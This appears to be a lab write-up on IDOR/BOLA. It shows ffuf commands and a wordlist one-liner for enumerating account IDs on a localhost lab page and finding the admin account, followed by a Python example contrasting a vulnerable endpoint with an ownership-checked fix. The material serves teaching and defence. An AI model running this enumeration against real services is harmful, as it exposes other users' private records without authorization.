
IDOR/BOLA - Insecure Direct Object Reference

The application requests a resource by its object ID (here an account number) and trusts that ID without checking that the object belongs to the caller.

In API security the same flaw is usually called BOLA: Broken Object Level Authorization.

Changing the account parameter in the request from 1009 to 1010 returns a different user's record.

Enumerate all the users?

Since the user IDs are in the 1000+ range, generate a wordlist covering 1 to 2000 (Python's range(1,2001)):

python3 -c 'for i in range(1,2001): print(i)' > num.txt

Feed it to ffuf as the account parameter:

ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w num.txt

Filter out the responses for non-existent accounts, which all have the same size (849 bytes):

ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w num.txt -fs 849

To pick out the admin account among the hits, either use Burp Suite Intruder, or write a script that requests each account number found with curl and greps the response for:

Type: admin

based on the Type field shown in the account page's response.
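The fix on the server side is an object-level authorization check. The following is an added example, not the lab's code: a minimal account endpoint in the shape of e0x02.php?account=ID, first with the BOLA defect and then with the ownership check, plus a sweep over the ID range to show what each version leaks; all names, the store and the admin role on the session are constructed.

```python
# Added example (not from the original notes): a minimal account endpoint in the
# shape of the lab's e0x02.php?account=ID, vulnerable and fixed. Data is constructed.
from dataclasses import dataclass

# Constructed sample store: account IDs in the 1000+ range, like the lab's.
ACCOUNTS = {
    1009: {"owner": "alice", "type": "user"},
    1010: {"owner": "bob", "type": "user"},
    1042: {"owner": "carol", "type": "admin"},
}

@dataclass
class Session:
    """Authenticated caller. Assumed to come from a verified server-side session,
    never from a request parameter (constructed: role is stored on the session)."""
    user: str
    role: str = "user"

class AccessDenied(Exception):
    pass

def get_account_vulnerable(session: Session, account_id: int) -> dict:
    """BOLA: the ID from the query string is trusted as-is and the session is
    never consulted, so any logged-in user can read any account by changing 1009 to 1010."""
    if account_id not in ACCOUNTS:
        raise AccessDenied(account_id)
    return ACCOUNTS[account_id]

def get_account_fixed(session: Session, account_id: int) -> dict:
    """Object-level authorization: the record must belong to the caller, or the
    caller must hold the admin role. Missing and foreign IDs raise the identical
    error, so response size (the -fs 849 filter above) cannot tell them apart."""
    record = ACCOUNTS.get(account_id)
    if record is None or (record["owner"] != session.user and session.role != "admin"):
        raise AccessDenied(account_id)
    return record

def accounts_readable_by(handler, session: Session, ids) -> list[int]:
    """Sweep an ID range against a handler (what the ffuf run above does) and
    report which IDs return a record to this caller."""
    readable = []
    for i in ids:
        try:
            handler(session, i)
            readable.append(i)
        except AccessDenied:
            pass
    return readable
```

With the vulnerable handler, a sweep of range(1, 2001) as alice returns every existing account; with the fixed handler it returns only 1009, and the same sweep as an admin session returns all three.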